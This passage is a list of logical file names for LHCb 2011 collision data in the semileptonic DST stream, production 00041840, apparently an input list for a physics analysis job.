'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016300_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024718_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039169_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058831_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046189_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062778_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010107_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009168_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017062_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047220_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033266_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042090_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005879_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033677_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018393_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031640_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015715_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035035_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024927_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037234_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068821_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034413_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041897_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064896_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031739_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058097_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027427_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008248_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040021_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039064_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049467_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064119_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010937_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022876_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007120_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034856_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015581_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054355_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049779_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022580_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049096_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069444_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017016_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046862_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027574_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060590_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059299_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038022_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051380_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054062_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010171_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061177_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027818_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063848_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031992_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054208_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060737_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053874_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056941_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067297_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054750_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049111_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051870_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015512_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020666_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051090_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031382_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039887_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062049_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018621_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017841_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016302_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054878_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043502_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008197_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043308_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028373_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045525_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059082_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033975_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050468_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005914_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057255_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008153_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059178_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016197_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015115_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055255_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054892_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027563_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064960_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063998_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056674_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064454_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057356_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010203_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029010_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009539_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035414_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057274_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041806_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044703_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025389_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044920_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023194_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005900_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035191_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057023_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036073_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016304_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043306_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054403_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060738_1.semileptonic.dst',
